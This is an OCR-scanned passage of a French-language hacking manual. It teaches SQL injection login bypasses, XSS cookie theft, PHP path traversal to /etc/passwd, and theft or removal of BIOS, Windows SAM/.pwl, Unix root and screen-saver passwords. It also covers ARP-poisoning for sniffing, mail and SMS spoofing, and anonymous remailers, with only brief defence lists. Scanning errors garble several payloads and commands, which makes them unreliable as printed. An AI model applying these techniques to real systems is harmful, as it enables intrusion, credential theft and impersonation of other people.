Comme nous venons de le voir, pour realiser cette attaque, on doit se trouver en face 
de serveurs autorisant (ne filtrant pas si vous preferez) les caracteres dit « speciaux », 
et l'utilisation des mots cles comme OR, AND, NOT. . . 

Un peu de theorie avant de passer a la pratique. Pour qu'une requete reussisse, elle 
doit etre declaree vraie par le serveur, et c'est cela son point faible car si Ton utilise 
des egalites toujours considerees comme vraies a la place du contenu des variables 
que peut bien faire le serveur ne filtrant pas les caracteres speciaux a part accepter la 
requete qui est vraie. 

Les exemples valent mieux que des explications pour comprendre cette technique. 

comment injecter ce que l'on veut dans des requetes SQL ? 

Nous allons utiliser les egalites toujours considere comme vraie (1=1, g=g, n=n...) les 
operateurs comme OR, AND, et certains caracteres speciaux comme « ' », « — », 
« /* », « */ »... 

Mon identifiant est : voila, mon passe est : securite, la table qui contient la liste des 
mots de passe et identifiants associes s'appelle idpass. 

Voici une requete de authentification normale faite sur un serveur : 

SELECT * from idpass WHERE id=' voila' AND pass=' securite' 
(www . site . com/page . php ?id=voi la Spas s= securite ) 

Maintenant, voici une requete d'authentification modifiee par un pirate et etant bonne 
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SELECT * from idpass WHERE id=" OR ^1' =' 1' OR 'l'='l' AND 
pass=' ' 

(www . site . com/page . php?id=' or' 1 ' = ' l'or' 1 ' = ' 1) 

Cette technique a utilisee l'operateur OR et les egalites toujours considerees comme 
vraie. 

Une autre technique consiste a employer les caracteres speciaux qui sont utilises pour 
mettre les commentaires dans les langage comme le PHP. . . 

Nous allons done utiliser « /* », « */ » et « ~ ». Ces caracteres vont servir a 
discriminer certaines parties de la requete d'authentification. 

SELECT * from idpass WHERE id=" OR =' I' / * ' AN D pass = ' */ OR 

Tout ce que nous venons de voir sur le SQL injection est utilisable si Ton ne connait 
ni l'id ni le mot de passe d'une des veritable personnes s'authentifiant sur le site. Des 
fois, on connait au moins l'id (login) d'un des inscrits. II va done falloir modifier les 
requetes que Ton avait cree pour qu'elles prennent en consideration ce nouvel 
element. 



XSS (Cross Site Scripting): 

Le XSS (Cross Site Scripting) est une technique qui consiste a modifier directement 
1'UPvL d'une page en PHP a notre avantage. Elle est realisable avec un navigateur et 
des connaissances sur la maniere dont son codees des informations dans une URL. 

Une URL est constitute du protocole utilise (par exemple http://) puis du nom de 
domaine du site sur lequel on se trouve; enfin, il y a le chemin d'acces au fichier sur 
lequel on se trouve. 

Sur les serveurs potentiellement vulnerables au XSS, il y a ensuite un « ? » suivi des 
noms des variables, de signes « & », « % », de valeurs et de chiffres. 

Pour savoir si un serveur est vulnerable, il va falloir y faire des tests. Tapez par 
exemple : 

www . site . com/ page . php?<script>alert («vulnerable») ; </script> 

Si en pressant la touche entree, on voit un cadre qui s'affiche a l'ecran avec le mot 
«vulnerable», cela veut dire que le serveur est vulnerable aux XSS. 

Certains serveurs ont un peu mieux securises leurs codes PHP mais sont encore 
vulnerables. II suffit juste de remplacer les caracteres de l'URL de test par leurs 
equivalents UNICODE. 
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Le XSS est une technique plutot simple d'emploi mais qui a des pouvoirs enormes. 
L'exemple le plus courant est le mail qu'un pirate envoi a un internaute. Ce mail 
contient un lien vers un site que l'internaute a l'habitude de visiter : bien sur le lien a 
ete truque par le pirate dans le but que ce dernier recoive le cookie d' identification de 
l'internaute. Ce cookie va lui permettre de se reconnecter a la mail box de l'internaute 
et d'y faire ce que bon lui semble. II y a pleins d'autres possibilites d'utilisation du 
XSS, cela depend de l'imagination du pirate. 

Voici un fait divers sur l'utilisation du XSS. II remonte a octobre 2002, lorsque les 
membres de la HACKADEMY TEAM decouvrirent qu'a l'aide du XSS, on pouvait 
pratiquement acceder aux donnees des comptes en ligne des clients de certaines 
banques francaises. 

la faille include() : 

En programmation, la fonction include( ) permet d'inclure des fichiers externes dans 
le code source utilisant cette fonction. La n'est pas le probleme ! 

Generalement, les createurs de sites Web dynamiques utilisant cette fameuse fonction 
oublient de faire un controle sur les fichiers inclus, il est done possible d'inclure ce 
que Ton veut et pourquoi pas les fichiers de configuration du serveur cible ? Ou le 
fichier de mots de passe ? ou encore un fichier d'un autre site/serveur ? 

Voici un bout du code d'un script PHP utilisant la fonction include ( ) : 

<? 

include ($page) ; 

?> 

Cela va nous dormer dans la barre a l'adresse : 

www . site . com/xxx . php?page= [ nom de page quelconque] 

Pour y introduire ce qu'ils veulent, les pirates modifient 

« [nom_de _page quelconque] » par un fichier choisi prealablement. 

Pour securiser tout cela, il va falloir faire un controle sur les arguments passes. 

Exemple : 

< ? 

if ( f ile_exists ( $page) ) 

include ($page) 

else 

include ("40 4.php") 

?> 

ou encore 
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<? 

if ( $page="xxx" ) include ("news . php") ; 

?> 

La deuxieme methode de securisation est a utiliser pour toutes les pages du site qui 
peuvent etre inclus dans une requete et a la possibilite de ne pas permettre d'inclure 
n'importe quel fichier meme s'il existe sur le serveur. 

Une autre methode de securisation pourrait passer par l'utilisation d'une fonction qui 
listerait le contenu d'un repertoire precis pour savoir si les fichiers a inclure sont 
presents sur le serveur. 

la fonction fopen( ) : 

La difference entre fopen( ) et include( ) est que la premiere fonction ne fait pas 
qu'inclure le fichier mais l'ouvre aussi. De plus, les inclusions de fichiers sont de plus 
en plus filtrees, alors que les ouvertures de fichiers avec fopen( ) ne le sont pas 
vraiment. 

Cette technique est utilisable seulement si la fonction fopen( ) utilise une variable 
comme argument : 

<? fopen («$var», «r») ; ?> 

et que l'on retrouve cette variable dans l'url de la page. 

Si les conditions precedentes sont verifiees alors on va pouvoir ouvrir des fichiers se 
trouvant sur le serveur ou sur d'autres serveurs. Et si on consultait le fichier passwd 
du serveur : 

http : //www . site . com/ page . php?var= ../../../.. /etc /passwd 
(le nombre de repertoire pour l'atteindre est a chercher) 

http : //www . site . com/page . php?var=http : / /cible/ . ./. ./. ./etc/pas 
swd 

(ou un autre fichier du site) 

Rien ne vous empeche de creer une page contenant cette fonction pour explorer le 
serveur que vous voulez. 

les CGI : 
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Les CGI (Common Gateway Interface) sont des applications Web visibles et 
utilisables par les navigateurs. Les CGI sont a la base crees pour donner une certaine 
interactivite avec l'utilisateur, generer dynamiquement des pages, images (...) et 
enregistrer des informations donnees par l'utilisateur. 

Les CGI sont generalement constitutes de deux elements de base: un formulaire que 
voit et rempli l'utilisateur, et d'un programme qui traite les informations fournies. 

Pour pouvoir bien fonctionner, les CGI ont besoin des donnees de l'utilisateur, qui 
seront envoye au CGI a l'aide de methodes de transfert des donnees (les principaux 
sont GET et POST). Pour bien traiter les donnees, et les demandes, les CGI utilisent 
des variables d'environnement puis renvoient le(s) resultat(s) . 

Ces applications peuvent etre ecrites dans divers langages (C, PERL...) . 

Les CGI ont malgre tout certains inconvenients plutot important : ils sont executes sur 
le serveur Web et disposent generalement de droits tres eleves done si les CGI sont 
pirates, les auteurs de ce mauvais tour pourront executer divers programmes sur le 
serveur ou reside le CGI. Et pourquoi ne pas utiliser un shell ? Ou afficher le fichier 
de mots de passe ? 

Pour decouvrir les vulnerabilite dont souffre certains CGI, les pirates utilise des 
scanners de vulnerabilites de CGI comme whisker de RPP, N-STEALTH. . . 

Voyons comment decouvrir manuellement des failles dans les CGI. 



analyse du code source : 

II faut analyser le code source des formulaires ou autres scripts donnant acces a un 
CGI. Pretez surtout attention aux informations contenues entre les balises HTML : 
<form> ... </form>, les champs caches du formulaire, les textes et les informations 
par defaut, les methodes d'envoi, les differents chemins d'acces a d'autre scripts, les 
fonctions (systemes ou non) utilisees comme system( ), open( ). . . et le nom des 
variables. 



analyse des URL : 

Copier les URLs des differentes pages, avant et apres la saisie des donnees du 
formulaire et comparez-les. Relevez les variables et leur(s) valeur(s) associee(s) et 
etudiez-les attentivement avec les variables du formulaire. Modifiez les valeurs, voir 
ce qui se passe, et ainsi de suite jusqu'a ce que vous puissiez penetrer le serveur Web 
et utiliser ses ressources (grace a un telnet inverse par exemple) . 



D' autres failles web 
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Le fichier robot.txt 



robot.txt est un fichier qui est place a la racine d'un site web et qui est utilise par les 
moteurs de recherche. 

Lorsque ces derniers rencontrent ce fichier, ils ne vont pas inclure dans le resultat de 
la recherche les repertoire qui se trouvent dans le fichier : il sert done a cacher des 
repertoires. 

Par contre, lorsque l'on fait une recherche avancee dans google ou dans d'autres 
moteurs de recherches en specifiant que l'on veut acceder a tous les fichiers robots 
qu'ils ont conserve dans leurs bases de donnees, les moteurs de recherches nous 
affichent une liste incroyable (mais vrai) de liens vers des fichiers robots. Cela peut 
permettre a un pirate de se deplacer dans des repertoires prives qui peuvent contenir 
des donnees importantes ou non (comme les repertoire d' administration du site, le 
repertoire ou est situe les fichiers de la base de donnees. . .) . 

Ce n'est pas une faille : ce fichier est un element a double tranchant facilitant la tache 
des moteurs de recherches et des webmasters mais aussi des pirates. 

D'autres fichiers 

Lorsque l'on cree un site, on a souvent envie de proteger l'acces a certains fichiers ou 
repertoires. Cela est possible grace aux fichiers .htaccess et .htpasswd. 

.htaccess va etre le fichier qui protege le repertoire grace a un mot de passe et 
.htpasswd le fichier qui contient le mot de passe. Pour information, .htaccess detient 
l'adresse du fichier .htpasswd. 

II est possible d' acceder au contenu de ces deux grace a son navigateur. Google peut 
parfois etre utile pour chercher les fichiers precedemment cites. 

Parades : 

- utilisez les fonctions de securite des langages utilises pour creer des 
applications Web, 

faites un audit de securite des codes des scripts de votre site, 

faites des controles sur les arguments passes au fonctions, 

il faut que les serveurs Web et mails flltrent les caracteres speciaux mis 

dans les requetes. 
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Messageries et cookies 



Dans ce chapitre, nous allons apprendre a analyser les champs des en-tetes des mails, 
cela va nous permettre de savoir qui est le vrai emetteur d'un message et plein d'autres 
choses encore. Puis nous allons voir comment les pirates et pleins d'autres personnes 
envoi de messages electroniques anonyme. Pour finir ce chapitre, nous allons parler 
des cookies, de leur formation, de leur constitution, et de leur fonctionnement. 



messages electroniques : 

Tout message transmis par internet est constitue de 2 parties : l'en-tete {header) et le 
corps (body). 

Champs de base : 

Voici la description des champs de base de l'en-tete d'un message : 

« Date: » : fournit la date et l'heure de la redaction du message. 

« From: » : fournit l'adresse de la personne ayant emis (transmis) le message. 

« To: » : fournit l'adresse du destinataire. 

« Subject: » : fournit l'objet (ou sujet) du message. 

Autres champs : 

« Cc: » : (Carbon Copy, copy carbone) permet d'envoyer le message a plusieurs 
personnes ; il peut contenir plusieurs adresses de messageries separees par des 
virgules. 

« Bcc: » : (Blind Carbon Copy, copie cabone cachee), comme Cc : , permet 
d'envoyer le message a plusieurs personnes, la difference est qu'avec Bcc : , les 
differents destinataires ne savent pas a quelles autres personnes le message a ete 
envoye. 

« Reply-To: » : permet de specifier une adresse de retour autre que celle mis dans 
From :. 

« Message-id: » : ceci est l'identifiant unique du message, genere par le logiciel de 
messagerie. 

« Received: » : champ ajoute par un serveur SMTP des qu'il le recoit et avant son 
envoie au relais suivant. 
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Constitution de ce champs: apres le from , on retrouve l'adresse DNS de la 
machine sur lequel le logiciel de messagerie (du redacteur) est execute ; puis apres le 
by, l'adresse DNS du serveur SMTP qui a ajoute ce champ ; puis on a le protocole 
utilise et l'id du message ; et enfin l'adresse de messagerie du destinataire et la date 
de reception du message. 



« From » (a ne pas confondre avec le From de base qui contient deux points « : ») et 
« Return-Path: » contiennent une adresse qui permet de remonter a l'expediteur. (9a 
peut servir quand on a affaire a un spammer). Ces champs sont ajoutes par le dernier 
relai delivrant le message. 

« Sender: » contient une adresse lorsque From: n'est pas celle de la personne ayant 
reellement emis le message. 

« Resent-From: » contient l'adresse de la personne qui a ecrit le message 
(normalement c'est la meme personne que celle l'ayant emis, j'ai bien dit 
normalement) 

Pour ceux qui veulent aller plus loin, sachez que certains en-tetes HTTP ont les 
memes en-tetes que ceux etant dans les messages electroniques. Cela peut permettre 
de contourner certaines protections etant dans les logiciels de messageries gratuites 
(comme Hotmail) en travaillant directement dans les en-tetes des messages 
electroniques. 



messageries anonymes : 

A quoi peuvent bien servir les messageries anonymes ? 

Se proteger, se cacher, masquer la source (l'expediteur) d'un message. Oui, c'est vrai, 
mais pas seulement, cela peut aussi servir a ne pas fournir aux destinataires (ou pirate 
sniffant ou controlant un systeme qui re-achemine des paquets comme des serveurs et 
des routeurs) les informations contenues dans les en-tetes de messages 

Maintenant, nous allons voir differents moyens pour etre anonyme sur internet avec 
notre messagerie. 

les webmails gratuites : 

Vous devez connaitre les domaines du genre hotmail.com et netcourrier.com ou 
caramail.com ? 

Et bien, ce sont leur service de messagerie gratuite qui va nous permettre d' avoir une 
adresse de messagerie anonyme. Bien sur, ne dormer pas vos vrais nom et prenom 
lors de l'enregistrement sinon ou passe votre anonymat ! ! ! 
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les remailers anonymes : 

lis sont encore mieux que les messageries gratuites car les messages electroniques 
passent par plusieurs serveurs SMTP que Ton dit relais. Ce qui rend cette technique 
vraiment anonyme, est que les serveurs SMTP relais suppriment les champs 
« Received : » des serveurs SMTP relais precedant. Done, grace a cette technique, 
seul le dernier serveur SMTP relais est sauvegarder dans l'en-tete du message 
electronique avec l'en-tete « Received : ». II est done theoriquement impossible que 
Ton remonte a l'emetteur. 

Anonymizer.com a un service de remailer anonyme. 



Conclusion : 

Utiliser les 2 techniques enoncees dans cette partie pour votre anonymat. 

les cookies : 

Vous avez deja du entendre parler des cookies , ces petits fichiers textes contenant 
des informations envoyees par le serveur au client et etant stockes par le client (vous 
si vous preferez). 

En 1990, Montulli de Netscape, crea le cookie pour qu'il puisse assurer une certaine 
persistance dans la communication sur le web (comme les transactions). 

En-tetes des cookies : 

L'en-tete Set-Cookie : il est insere dans l'en-tete d'une reponse envoyee par un 
serveur a un client dans le but de le positionner chez le client. Voici sa syntaxe: 



Set-cookie : NOM=VALEUR ; expires=DATE ; domain=DOMAINE ; 
path=CHEMIN; secure 



NOM= VALEUR 


Nom du cookie et sa valeur (champ obligatoire) 


expires =DA TE 


Date d' expiration du cookie (champ optionnel) 


domain =DOMAINE 


Permet de specifier le domaine pouvant avoir acces au cookie (champ 
optionnel). Si ce champ n'est pas specific seul le serveur ayant cree (ou 
genere) le cookie peut y avoir acces. 


path=CHEMIN 


Permet de specifier le prefixe des URL ou le cookie est utilise et 
applique (champ optionnel) 
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secure 



Champ qui, s'il est mis, envoie le cookie et sa valeur seulement lors de 
connexions chiffrees a l'aide de SSL. 



L'en-tete Cookie : permet d'inclure la valeur d'un ou plusieurs cookie(s) dans 
une requete HTTP a l'intention d'un serveur. Voici sa syntaxe : 
Cookie : Noml = Valeur 1 ; Nom2=Valeur2 



Comment les serveurs accedent aux cookies ? : 

Lorsque vous visitez un site qui a place un cookie sur votre systeme, votre 
navigateur va verifier s'il a un cookie appartenant au site qu'il visite en comparant 
le nom du site et la liste de cookie qu'il a. 

Si la reponse est affirmative, il compare l'url de la requete HTTP du site 
demandant le cookie et le champ path du cookie ; s'il y a coincidence entre ces 2 
arguments, et que la date d'expiration n'est pas atteinte alors le cookie est envoye 
au serveur. Si plusieurs cookies ont passe tous les test de validites precedents, ils 
seront tous envoyes au site grace a l'en-tete Cookie etudie precedemment. 

Si la date de validite du cookie est atteint, alors le cookie est supprime 
directement. 



Fausses informations: 



Les cookies ne sont pas des virus, car ce sont simplement des fichiers textes 
ouverts avec le bloc note done il est impossible de pouvoir faire executer des 
scripts sur le poste du client. 

Comme un cookie ne peut etre ni un script ni un virus ni un programme, alors il 
ne peut pas lancer de recherche sur le systeme du client dans le but d'y rechercher 
des informations. 



Comme le stockage des cookies est limite, il est impossible de porter une attaque de 
type DoS sur le systeme du client (en tout cas pour le moment, on ne sait jamais ce 
que l'avenir nous reserve). 



96 



97 



Cracking 
et 

contournement de mots de passe 



Ce chapitre pratique est oriente comprehension des techniques du piratage des mots 
de passe. 

Avant de continuer, je veux vous prevenir que je ne decrirais pas la technique qui 
consiste a essayer manuellement des mots de passe car des fois on est limite dans le 
nombre d'essais. 



BIOS : 

II existe differentes techniques pour enlever ou cracker un mot de passe BIOS. 
Pour savoir comment Ton accede au Bios, comment il fonctionne, referez-vous au 
manuel de votre carte mere. 



le cavalier : 

La technique la plus simple et qui fonctionne a chaque fois est le deplacement du 
cavalier (jumper) qui a pour but d'effacer les donnees contenues dans le CMOS (cf le 
manuel de votre carte mere). Ce cavalier est generalement situe a cote de la ROM 
BIOS. 

Protocole : changer le cavalier de positions (generalement en position 2-3) attendre 
quelques secondes puis le replacer en position initiale. Si tout s'est bien passe, on ne 
devrait plus avoir de mots de passe au demarrage. 



un peu de technique : 

En decidant de travailler sur la carte mere pour avoir le mot de passe BIOS, on peut 
flasher le Bios en le reprogrammant a l'aide reprogrammateur de EEPROM. II y a 
bien sur une chance sur deux de reussir. De plus, il faut avoir des bases en 
electronique, en hardware, ou en overclocking car on risque de perdre votre carte. 



la pile : 
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Cette technique necessiter aussi de travailler sur la carte mere. Cette pile se situe sur 
la carte mere, elle permet la sauvegarde d'informations comme l'heure systeme. . . 
II faut la localiser puis la decharger en l'enlevant pendant une journee voir plus. 



des logiciels : 

Certains logiciels nous propose de voir le mot de passe BIOS du systeme. Mais il faut 
avoir au moins une fois acces au systeme d' exploitation pour pouvoir les installer. 

Voici 2 logiciels permettant de voir le mot de passe du BIOS : 

• AMI BIOS RECOVER 

• AWCRACK ... 



les fichiers de mots de passe : 

Pour trouver les mots de passe des fichiers password (ou fichiers de mots de passe), il 
faut utiliser les logiciels de cracking de mots de passe. Les plus importants sont John 
the Ripper, LophtCrack du Lopht, Crack. . . 



Windows 95/98 et les fichiers .pwl : 

Le fichier de mots de passe de Windows 9x est le fichier ayant comme extension .pwl 
se situant dans le repertoire C:\Windows\. Ce fichiers est bien sur crypte et les 
logiciels cites precedemment sont capables de le decrypter. 

Pour recuperer ce fichier, il y a une panoplie de choix. 

Les techniques les plus simple seraient : 

- l'utilisation d'une disquette contenant un fichier batch qui aurait pour but de 
copier le fichier .pwl du repertoire C : \windows\ vers la disquette pour 
qu'on le decrypte sur son ordinateur. Le fichier batch pourrait contenir un 
code du genre : copy C : \windows\* .pwl a: 

- de contourner l'utilisation des fichiers .pwl des le debut du lancement de 
l'ordinateur. II faut pour cela avoir un ecran MS-DOS a l'aide d'une disquette 
de demarrage et renommer tous les fichiers .pwl en ce que nous voulons, 
normalement on devrait pouvoir acceder au systeme sans mot de passe ou 
pouvoir affecter un nouveau mot de passe au compte. 

Windows NT et le fichier SAM : 

Le fichier de mot de passe de Windows NT est le fichier SAM qui situe dans le 
repertoire C:\Windows\system32\config\ ou C:\WinNT\system32\config (a vous de 
voir, c'est peut-etre autre chose) . 
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Le fichier SAM se craque a l'aide de lophtcrack, john the ripper, crack5. 

Pour recuperer le fichier SAM, on peut : 

- soit demarrer l'ordinateur avec un autre systeme et prendre le fichier 
SAM qui n'est plus protege par le systeme Windows, 
soit installer (il faut pouvoir installer des utilitaires) NTFSDOS (le 
pilote du systeme de fichier NTFS) pour monter les partitions NTFS en 
lecteur DOS logique. On peut maintenant prendre le fichier SAM qui 
n'est plus protege par Windows. 

soit le recuperer dans le repertoire C:\Windows\repair\ ou encore 
C:\WinNT\repair\ qui correspond a l'utilitaire de reparation de disque 
ou de depannage. Le fichier SAM est generalement sous forme : 
« sam._ » 

On peut aussi utiliser une technique creee avec des hooks systemes ou 
d'autres fonctions des APIs Windows pour prendre le fichier SAM a 
distance (a l'aide de vers-virus par exemple) ou utiliser une technique 
d' injection DLL. 

soit utiliser les cles HLM\SECURITY\Policy\Secrets qui possedent des 
informations que seul votre systeme doit connaitre : des informations 
confidentiels comme des mots de passe. 

Unix et ses fichiers passwd et shadow : 

Unix utilise des fichiers distants pour stocker les logins et les mots de passe, 
respectivement /etc/passwd et /etc/shadow. 

Pour les decrypter, on peut soit utiliser john the ripper, soit crack. 

Pour les recuperer, on peut infiltrer le serveur NIS qu'aurait peut-etre installe 
l'administrateur, copier les fichiers passwd, shadow et group du repertoire /etc/NIS, 
ou contourner l'authentification par mot de passe a l'aide de LILO. 



LILO est une application chargee de lancer Linux a la fin des actions du BIOS. LILO 
est une application a double tranchant car il permet de demarrer un systeme Linux a 
l'aide d'arguments fournit par l'utilisateur. II peut servir a faire de la maintenance mais 
aussi a demarrer des systemes sans mot de passe. 



Pour acceder a l'invite LILO, il faut garder la touche MAJ du clavier appuyee lors du 
demarrage de l'ordinateur. Normalement, il devrait y avoir un true du genre « LILO: 
». 

Vous pouvez alors : 

- soit taper « linux single » (sans les guillemets) puis « mount -w -n - 
o remount/ » qui remonte la partition en lecture/ecriture. Maintenant editez 
le fichier /etc/passwd pour qu'il ressemble a : 
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« root: :0:0 -.root: /root: /bin/sh » (sans les guillemets). Si linux utilise 
le fichier shadow pour stocker les mots de pass, /etc/passwd doit ressembler 
a : « root:x: 0 : 0 : root : /root : /bin/sh » (sans les guillemets). 
- soit taper <nom_image_du_kernel> 
init= [un shell par ex, sans les crochets] 

les mots de passe des ecrans de veille : 

Les ecrans de veille avec un mot de passe sont de tres bons systemes pour masquer ce 
que Ton fait sur son bureau lorsque Ton s'absente deux minutes. 

Voyant les differentes techniques de contournement des ecrans de veille 
le simple redemarrage : 

Pour contourner un ecran de veille ayant un mot de passe, le redemarrage est un bon 
moyen qui ,cela est vrai, ne sert a rien, car la personne effectuant ce redemarrage ne 
pourra voir ce que vous etiez en train de faire. 

les logiciels : 

Vous pouvez aussi utiliser les logiciels comme Sreen Saver Password 
(www.ptorris.com). 

Ce logiciel fonctionne avec le fichier user . dat disponible dans le repertoire de la 
session de l'utilisateur soit C : \Documents and 

Settings\ [nom_de_utilisateur] sous Windows XP Pro service Pack 1. Pour 
les autres systemes base sur NT, explorer vos repertoires C : \ ou C : \windows\ ou 
encore C : \windows\Prof iles\ a la recherche du repertoire de la session cible. 

regedit : 

Le mot de passe de l'economiseur d' ecran est aussi situe dans la base de registre, dans 

la cle : HKEY_Users\ . Def ault\Control Panel\ScreenSave_data 

La cle peut changer selon votre version de Windows. 

Vous pouvez aussi fouiller les cles commencant par hkey_current_user\ ou 

HKEY_USER\ 

Astuce : creer un programme qui parcourt les precedentes cles a la recherche 
d' informations. 



101 



autorun.inf : 

Les CD peuvent, s'ils sont equipes d'un fichier autorun.inf, lancer automatiquement 
des fichiers ou programmes des leur entree dans le lecteur CD-ROM. 

Cette caracteristique fonctionne aussi lorsque Ton lance l'ecran de veille. Done 
imaginer un CD ayant un fichier autorun.inf qui contienne l'adresse (sur le cd) d'un 
cracker de mots de passe d'ecran de veille apres « open= » du fichier autorun.inf . 



Pour information, tout les chemins d'acces a des logiciels ou des fichiers etant apres 
« open= » sont executes automatiquement lors de finsertion du cd dans le lecteur. 



divers : 

II existe des logiciels pour cracker differents types de documents proteges par mots de 
passe comme les fichiers ZIP, ARJ. . . 

Des sites comme celui de Pierre Torris (www.ptorris.com) et la plupart des sites 
warez proposent des crackers de mots de passe de tout genre. 

Cracking d'une securite javascript : 

Certains sites utilisent ce mecanisme pour filtrer les personnes autorisees a acceder a 
une page. 

Comme on ne peut acceder au code source de la page qu'apres s'etre bien authentifie, 
les webmasters marquent parfois le mot de passe en clair dans le code inclut entre les 
balises javascript (qui est affiche dans le code source contrairement au PHP). 

Notre but est de decouvrir ce mot de passe d'acces. Pour cela, ouvrez votre 
navigateur et le dossier « Temporary Internet Files ». Puis connectez-vous a la page 
protegee avec l'aide de votre navigateur et entrez un mot de passe bidon. 

Allez ensuite dans le repertoire ouvert et recherchez la page correspondant a la page 
fraichement visitee et etant protegee. 



Astuce : videz le repertoire « Temporary Internet Files » avant de faire la manoeuvre. 



Lorsque vous l'aurez trouve, ouvrez-la avec un editeur HTML ou avec le bloc note, 
recherchez le code javascript puis le mot de passe qui est soit en clair, soit chiffre. 

Maintenant, rafraichissez la page protegee et entrez le mot de passe trouve. . . 
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Parades : 

- la lere parade consiste a choisir un bon mot de passe. 

- la 2eme parade consiste a modifier la methode d'authentification 
qu'utilisent les logiciels et les systemes d'exploitation. 



103 



104 



Sniffing 



Le sniffing est une technique du piratage que Ton dit passive. C'est surtout une 
technique servant a espionner le trafic d'un systeme en surveillant et en copiant les 
paquets non cryptes circulant sur le reseau cible : cela va permettre de recuperer 
diverses informations importantes pour un pirate. Contrairement a ce que vous 
pouvez croire et a se que certains sites font croire, un sniffer ne permet pas 
d'espionner a distance un systeme eloigne et ne permet pas de controler la formation, 
le forgeage, la route et l'acheminements d'un paquet. 

La principal source de reussite du sniffing est que les informations (mots de passe, 
logins, mails, requetes. . .) circulant dans le reseau ne sont pas cryptees. 

Comme il a ete dit plus haut, un sniffer (logiciel permettant de faire du sniffing) ne 
capture que les paquets passant par la carte reseau du systeme sur lequel il est installe. 
Done pour espionner le trafic du systeme cible, il faut que ces paquets transitent par 
notre carte reseau. 

Un peu de pratique maintenant. 

comment espionner un trafic reseau : 
le mode promiscuite : 

Avant, etaient les reseaux poste a poste. Des qu'un systeme emettait un paquet, tous 
les autres systemes connectes a l'emetteur recevaient le paquet. C'etait la carte reseau 
qui s'occupait de savoir a qui etait destine le paquet et l'affichait ou non. Cela grace a 
un filtre. 

Bien sur, ce filtre pouvait etre enleve, en faisant passer la carte reseau en mode 
promiscuite. 

ARP : 

(cfle chapitre sur le detournement de sessions et le spoofing) 

Cela consiste a associer l'adresse IP de la passerelle par defaut a notre adresse MAC 
(l'adresse de notre carte reseau) . Comme cela, le trafic du systeme cible passera par 
notre carte reseau. Cette manipulation est a effectuer sur les systemes s'occupant du 
routage comme les switchs, les routeurs. . . ou sur le systeme cible. Pour que le trafic 
du reseau ne soit pas modifie et pour que l'on ne remarque pas cette usurpation, on 
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doit activer TIP forwarding et aj outer une entree dans la table ARP de la cible pour la 
veritable passerelle par defaut. 

On peut aussi modifier la table de routage du reseau de la cible. Le resultat sera le 
meme, associations de notre adresse MAC a l'adresse IP de la passerelle par defaut. 



lien direct : 

On peut se connecter directement au systeme cible : 

- soit en appelant le modem de la cible avec le notre (c'est la technique la plus 
simple qui ne marche peut-etre plus encore) : on doit alors connaitre le 
numero de son modem que l'on peut obtenir grace au wardialing. 

- soit en utilisant une faille du genre : exploit netbios 

- soit en utilisant un cheval de troie. 



les differents sniffers : 

II existe differents sniffers pour tous les systemes d'exploitation: 

- TCPdumps 

- Ethereal 

- dsniff 

- sniffit 

- LANWatch 

- Esniff 

- ATM sniffer 

- LinSniff 



Parades : 

- utilisez anti-sniff (qui repere les sniffers et les cartes reseau en mode 
promiscuite), 

- cryptez les paquets circulant sur le reseau, 

- verifiez regulierement les tables de routage, 

- desactivez les protocoles non utilises. 
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Le spoofing 



Le spoofing est une technique de piratage qui a pour but d'usurper les droits d'une 
personne ou de fournir de fausses informations pour se camoufier ou passer les 
systemes de securite. 

II existe plusieurs types de techniques de spoofing ayant des degres de difficultes 
variables. II y a par exemple le SMS spoofing, le mail spoofing, l'IP spoofing, le 
DNS spoofing, l'UDP spoofing, , l'ARP spoofing, le MAC spoofing (en rapport avec 
les adresses MAC). . . et on peut inventer encore pleins de technique ! 

Comme certains pourrait le croire cet ouvrage n'etablit pas les bases pour creer de 
nouvelles attaques, il veut seulement expliquer qu'en analysant les systemes et les 
protocoles qui servent au bon fonctionnement des reseaux, on peut trouver des 
faiblesses qui vont permettre de modifier certaines donnees ou d'intercepter certains 
signaux ou messages pouvant servir a passer certaines securites et a faire croire a un 
systeme qu'il dialogue et fonctionne normalement. Cette methode d'analyse est aussi 
utilisee dans 1' hijacking (detournement de session et de connexion). 

Voyons maintenant differentes techniques de spoofing. 



le SMS spoofing : 

le SMS spoofing consiste a envoyer des SMS avec un numero d'expediteur ne nous 
appartenant pas. Cela est possible a l'aide de logiciels comme Text2gsm 
(www.download.com) ou en creant ses propres scripts. 

le mail spoofing : 

Le mail spoofing consiste a envoyer des e-mails avec une adresse d'expediteur 
falsifiee. 

Cela est possible a l'aide de logiciels (comme toujours) servant a envoyer des e-mails 
ou faire du mail-bombing, a l'aide de scripts en PHP ou en PERL que vous pouvez 
developper. 

La technique de mail spoofing precedemment expliquee est la plus connue car est a 
la base du spam. 

Maintenant, imaginez un serveur pop/imap secret, le serveur de l'entreprise ou d'un 
gouvernement. Disons qu'un pirate a decouvert son existence et qu'il a reussi a 
obtenir une dizaine d'adresses de comptes mails etant heberges sur ce serveur. 
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Pour savoir a qui ils appartiennent, et les informations de connexion aux comptes, il 
decide d'envoyer des messages electroniques aux adresses obtenues en se faisant 
passer pour l'administrateur. Pour l'occasion, ils creer un client de messagerie 
integrant un mecanisme d'accuser reception indiquant que le mail a bien accede au 
serveur pop/imap cible. Mais apres avoir envoye les mails, il ne recoit toujours pas de 
reponses et decide d'infiltrer le serveur. II passe des heures a inspecter de fond en 
comble la machine et accede enfin aux informations qui voulait : les logins et les 
mots de passe des mail box. Tout content, il se deconnecte apres avoir effacer ses 
traces. 

Le lendemain, en cours (car il y a quand meme des pirates etant jeunes), il repense 
soudain a son exploit de la veille et se demande pourquoi ces mails n'ont pas accede 
au serveur pop. Le soir venu, il se reconnecte au serveur et apres une analyse 
minutieuse, il decouvre enfin que les mails sont filtres au niveau des en tete SMTP 
avant d'etre deposes sur le serveur; il comprend vaguement que les e-mails doivent 
avoir un certain mot dans leurs en tete pour etre acceptes. Apres des heures 
d'experimentation, ces mails accedent enfin au serveur cible. 

Ce petit scenario imagine a essaye de faire comprendre que Ton pouvait creer des 
mecanismes de filtrage meme au niveau des messages electroniques et que tout peut 
etre contourner avec un peu de connaissances. 

TIP spoofing 

C'est l'attaque la plus connue peut-etre grace a Kevin Mitnik, le hacker le plus 
mediatise du monde, qui avait, d'apres ce que l'on dit, reussi son attaque en faisant 
une prediction des numeros des sequences : nous verrons plus tard en quoi cela 
consiste. 

L'lP spoofing consiste a forger des paquets avec une adresse IP source ne nous 
appartenant pas, notre adresse IP ne change pas ! contrairement a ce que pourraient 
croire certaines personnes. 

En gros, on va truquer des paquets que nous enverrons a notre cible. 



D'abord, voyons quelques concepts theoriques. 



Version I IHL 1 Type de 


Longueur dupaquet 


I | service 




I dentificateur 


